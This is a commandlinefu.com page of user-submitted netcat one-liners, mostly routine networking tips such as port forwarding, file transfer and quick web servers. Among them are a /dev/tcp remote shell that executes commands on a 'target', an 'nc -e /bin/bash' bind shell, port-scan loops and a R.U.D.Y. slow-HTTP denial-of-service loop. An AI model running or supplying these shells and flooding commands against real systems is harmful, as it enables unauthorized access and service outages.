Commands tagged netcat (31)

  • Redirect the local port 2000 to the remote port 3000. The same but UDP: nc -u -l -p 2000 -c "nc -u example.org 3000" It may be used to "convert" TCP client to UDP server (or viceversa): nc -l -p 2000 -c "nc -u example.org 3000"


    25
    nc -l -p 2000 -c "nc example.org 3000"
    prayer · 2009-03-01 21:28:39 2
  • Very simple web server listening on port 80 will serve index.html file or whatever file you like pointing your browser at http://your-IP-address/index.html for example. If your web server is down for maintenance and you'd like to inform your visitors about it, quickly and easily, you just have to put into the index.html file the right HTML code and you are done! Of course you need to be root to run the command using port 80.


    12
    while true ; do nc -l 80 < index.html ; done
    ztank1013 · 2011-08-31 15:17:33 6
  • Command makes use of the Malware Hash Registry (http://www.team-cymru.org/Services/MHR/). It parses the current directory and subdirectories and calculates the md5 hash of the files, then prints the name and sends the hash to the MHR for a lookup in their database. The 3rd value in the result is the detection percentage across a mix of AV packages. Show Sample Output


    11
    IFS=$'\n' && for f in `find . -type f -exec md5sum "{}" \;`; do echo $f | sed -r 's/^[^ ]+/Checking:/'; echo $f | cut -f1 -d' ' | netcat hash.cymru.com 43 ; done
    Neo23x0 · 2011-10-15 03:38:47 0
  • Simple one-liner for scanning a range of hosts, you can also scan a range of ports with Netcat by ex.: nc -v -n -z -w 1 192.168.0.1 21-443 Useful when Nmap is not available:) Range declaration like X..X "for i in {21..29}" is only works with bash 3.0+ Show Sample Output


    9
    for i in {21..29}; do nc -v -n -z -w 1 192.168.0.$i 443; done
    rez0r · 2009-09-25 03:31:29 3
  • This is sneaky. First, start a listening service on your box. nc -l 8080 -vvv & On the target you will create a new descriptor which is assigned to a network node. Then you will read and write to that descriptor. exec 5<>/dev/tcp/<your_box>/8080;cat <&5 | while read line; do $line 2>&5 >&5; done You can send it to the background like this: (exec 5<>/dev/tcp/<your-box>/8080;cat <&5 | while read line; do $line 2>&5 >&5;) & Now everything you type in our local listening server will get executed on the target and the output of the commands will be piped back to the client. Show Sample Output


    9
    exec 5<>/dev/tcp/<your-box>/8080;cat <&5 | while read line; do $line 2>&5 >&5; done
    somaddict · 2012-11-16 02:48:01 0
  • Uses the extremely cool utilities netcat and expect. "expect" logs in & monitors for server PING checks. When a PING is received it sends the PONG needed to stay connected. IRC commands to try: HELP, TIME, MOTD, JOIN and PRIVMSG The "/" in front of IRC commands are not needed, e.g. type JOIN #mygroup Learn about expect: http://tldp.org/LDP/LGNET/issue48/fisher.html The sample output shows snippets from an actual IRC session. Please click UP button if you like it! Show Sample Output


    9
    nik=clf$RANDOM;sr=irc.efnet.org;expect -c "set timeout -1;spawn nc $sr 6666;set send_human {.1 .2 1 .2 1};expect AUTH*\n ;send -h \"user $nik * * :$nik commandlinefu\nnick $nik\n\"; interact -o -re (PING.:)(.*\$) {send \"PONG :\$interact_out(2,string)\"}"
    omap7777 · 2015-03-18 09:10:28 4

  • 8
    nc -l -p 2000 < song.mp3
    prayer · 2009-03-02 15:54:21 1
  • To connect to the shell run: nc server.example.org 2000


    6
    nc -l -p 2000 -e /bin/bash
    prayer · 2009-03-02 15:58:25 3
  • @putnamhill, no need if statement in that case. && is a AND and || is a OR


    6
    nc -zw2 www.example.com 80 && echo open
    sputnick · 2009-12-07 21:35:25 3
  • Try to perform a fully TCP 3 way handshake on for a given host-port with a timeout of 1s. Show Sample Output


    6
    nc -zvw 1 host port
    akhilravidas · 2012-07-13 20:02:17 0

  • 5
    lsof -i :22
    bucciarati · 2011-03-11 16:48:37 0
  • for udp nmap -sU -p 80 hostname


    4
    nmap -p 80 hostname
    solarislackware · 2009-12-08 20:25:28 0
  • Requires netcat.


    2
    if (nc -zw2 www.example.com 80); then echo open; fi
    putnamhill · 2009-12-07 20:04:55 0

  • 2
    grep current_state= /var/log/nagios/status.dat|sort|uniq -c|sed -e "s/[\t ]*\([0-9]*\).*current_state=\([0-9]*\)/\2:\1/"|tr "\n" " "
    c3w · 2010-03-11 06:04:14 0
  • command | my_irc Pipe whatever you want to this function, it will, if everything goes well, be redirected to a channel or a user on an IRC server. Please note that : - I am not responsible of flood excesses you might provoke. - that function does not reply to PINGs from the server. That's the reason why I first write in a temporary file. Indeed, I don't want to wait for inputs while being connected to the server. However, according to the configuration of the server and the length of your file, you may timeout before finishing. - Concerning the server, the variable content must be on the form "irc.server.org 6667" (or any other port). If you want to make some tests, you can also create a fake IRC server on "localhost 55555" by using netcat -l -p 55555 - Concerning the target, you can choose a channel (beginning with a '#' like "#chan") or a user (like "user") - The other variables have obvious names. Show Sample Output


    1
    function my_irc { tmp=`mktemp`; cat > $tmp; { echo -e "USER $username x x :$ircname\nNICK $nick\nJOIN $target"; while read line; do echo -e "PRIVMSG $target :$line"; done < $tmp; } | nc $server > /dev/null ; rm $tmp; }
    Josay · 2009-06-11 22:14:48 0
  • sends commands specified in $commandfile to the telnet-server specified by $telnetserver. to have newlines in $commandfile interpreted as ENTER, save the file in CR+LF (aka "Windows-Textfile") format. if you want to save the output in a separate file, use: nc $telnetserver 23 < $commandfile > $resultfile


    1
    nc $telnetserver 23 < $commandfile
    flokra · 2009-08-07 21:32:38 0
  • USAGE: gate listening_port host port Creates listening socket and connects to remote device at host:port. It uses pipes for connection between two sockets. Traffic which goes through pipes is wrote to stdout. I use it for debug network scripts.


    1
    gate() { mkfifo /tmp/sock1 /tmp/sock2 &> /dev/null && nc -p $1 -l < /tmp/sock1 | tee /tmp/sock2 & PID=$! && nc $2 $3 < /tmp/sock2 | tee /tmp/sock1; kill -KILL $PID; rm -f /tmp/sock1 /tmp/sock2 ; }
    true · 2009-09-25 08:10:23 1
  • On the another machine write this command. pv -r /dev/zero | nc 192.168.1.1 7777 It will show live throughput between two machine.The destination machine ip is at our example 192.168.1.1 You must multiply by 8 for the network calculation. You must install pv and netcat commands for this commands usage. kerim@bayner.com http://www.bayner.com/ Show Sample Output


    1
    nc -l -p 7777 > /dev/null
    kerim · 2011-01-24 00:06:45 2
  • Use it to send raw data to a networked device. Used to interact with relay controller board whose documentation is lost, so use wireshark to sniff the sent data and replayed using the command.


    1
    echo -n 023135 | perl -pe 's/([0-9a-f]{2})/chr hex $1/gie' | nc -4u -q1 -p5001 192.168.0.100 2000
    sucotronic · 2013-09-18 14:31:47 0
  • Tar's up $DIR locally (w/bzip2) and sends remotely to $HOST:$PORT where netcat listens (using openbsd netcat). Start up receiving side command first, then execute this.


    0
    tar -cjf - $DIR | nc $HOST $PORT
    taintedkernel · 2012-11-13 16:44:26 0
  • Receives bzip'd tar archive via netcat (openbsd nc) and stores locally. Displays size with pv. Start this receiver first, then the sender.


    0
    nc -l $PORT | pv -b > archive.tar.bz2
    taintedkernel · 2012-11-13 16:47:45 0
  • wmr - | pv -s $SIZEOFMEM | ssh -p 40004 -c arcfour,blowfish-cbc -C root@savelocation.com "cat - > /forensics/T430-8gb-RAM1.dd" Run above command from Windows Cygwin: On Windows: Install Cygwin, and copy WMR (windows memory reader 1.0) memory diagnostic into cygwin\bin folder, also install cygwins netcat and ssh (openssh). I recommend installing apt-cyg and running " On Linux: Have an SSH Server SIMPLEST FORM: WINDOWS: # wmr - | ssh root@savelocation.com "cat - > /tmp/FileToSave.dd" For more details on how to extract information from memory dump: apt-get install foremost foremost -t all -T -i /forensics/T430-8gb-RAM1.dd For more information: http://www.kossboss.com/memdump-foremost Show Sample Output


    0
    wmr - | pv -s $SIZEOFMEM | ssh -p 40004 -c arcfour,blowfish-cbc -C root@savelocation.com "cat - > /forensics/T430-8gb-RAM1.dd"
    bhbmaster · 2013-05-31 00:04:19 0
  • A TCP server that keeps the same socket open, sending the contents of "file" repeatedly.


    0
    while true; do cat "file"; done | nc -v -l 1337
    bknk · 2014-02-06 03:02:58 0
  • If you want to see your top ten cpu using processes from the browser (e.g. you don't want to ssh into your server all the time for checking system load) you can run this command and browse to the machines ip on port 8888. For example 192.168.0.100:8888 Show Sample Output


    0
    while true; do ps aux | sort -rk 3,3 | head -n 11 | cut -c -120 | netcat -l -p 8888 2>&1 >/dev/null; done &
    manumiu · 2014-08-29 07:10:57 0
  • Check if your HTTP server is vulnerable to a very effective variant of slow HTTP attack called R.U.D.Y (R-U-Dead-Yet?). This command tries to keep many connections to the target web server and hold them open as long as possible. Affected server will exhaust its maximum concurrent connection pool and deny additional connection attempts from legitimate clients. Use it with caution!


    0
    for i in `seq 300`; do ( ( echo -e "POST / HTTP/1.1\nHost: vhost.domain\nContent-length: 100000\n\n"; for j in `seq 600`; do echo $j=$j\&; sleep 5; done ) | nc vhost.domain 80 & ); done
    elceef · 2015-04-15 14:02:55 0
  •  1 2 > 

What's this?

commandlinefu.com is the place to record those command-line gems that you return to again and again. That way others can gain from your CLI wisdom and you from theirs too. All commands can be commented on, discussed and voted up or down.

Share Your Commands


Check These Out

Find usb device in realtime
Using this command you can track a moment when usb device was attached.

keep an eye on system load changes
helps you keep watch on the load of a system, without having to stare constantly at the terminal. The -d argument to watch highlights the difference from the last run, making it easier to note how the load is fluctuating. The sed command just strips off the information about how long the box has been up, and how many users are logged in.

Read and write to TCP or UDP sockets with common bash tools
Ever needed to test firewalls but didn't have netcat, telnet or even FTP? Enter /dev/tcp, your new best friend. /dev/tcp/(hostname)/(port) is a bash builtin that bash can use to open connections to TCP and UDP ports. This one-liner opens a connection on a port to a server and lets you read and write to it from the terminal. How it works: First, exec sets up a redirect for /dev/tcp/$server/$port to file descriptor 5. Then, as per some excellent feedback from @flatcap, we launch a redirect from file descriptor 5 to STDOUT and send that to the background (which is what causes the PID to be printed when the commands are run), and then redirect STDIN to file descriptor 5 with the second cat. Finally, when the second cat dies (the connection is closed), we clean up the file descriptor with 'exec 5>&-'. It can be used to test FTP, HTTP, NTP, or can connect to netcat listening on a port (makes for a simple chat client!) Replace /tcp/ with /udp/ to use UDP instead.

Extract title from HTML files
This command can be used to extract the title defined in HTML pages

Display IPs accessing your Apache webserver.

Which processes are listening on a specific port (e.g. port 80)
swap out "80" for your port of interest. Can use port number or named ports e.g. "http"

Save a file you edited in vim without the needed permissions
I often forget to sudo before editing a file I don't have write permissions on. When you come to save that file and get the infamous "E212: Can't open file for writing", just issue that vim command in order to save the file without the need to save it to a temp file and then copy it back again.

Print a list of all hardlinks in the working directory, recursively
libpurple likes to hardlink files repeatedly. To ignore libpurple, use sed: | sed '/\.\/\.purple/d'

Get AWS temporary credentials ready to export based on a MFA virtual appliance
You might want to secure your AWS operations requiring to use a MFA token. But then to use API or tools, you need to pass credentials generated with a MFA token. This commands asks you for the MFA code and retrieves these credentials using AWS Cli. To print the exports, you can use: `awk '{ print "export AWS_ACCESS_KEY_ID=\"" $1 "\"\n" "export AWS_SECRET_ACCESS_KEY=\"" $2 "\"\n" "export AWS_SESSION_TOKEN=\"" $3 "\"" }'` You must adapt the command line to include: * $MFA_IDis ARN of the virtual MFA or serial number of the physical one * TTL for the credentials

check open ports without netstat or lsof


Stay in the loop…

Follow the Tweets.

Every new command is wrapped in a tweet and posted to Twitter. Following the stream is a great way of staying abreast of the latest commands. For the more discerning, there are Twitter accounts for commands that get a minimum of 3 and 10 votes - that way only the great commands get tweeted.

» http://twitter.com/commandlinefu
» http://twitter.com/commandlinefu3
» http://twitter.com/commandlinefu10

Subscribe to the feeds.

Use your favourite RSS aggregator to stay in touch with the latest commands. There are feeds mirroring the 3 Twitter streams as well as for virtually every other subset (users, tags, functions,…):

Subscribe to the feed for: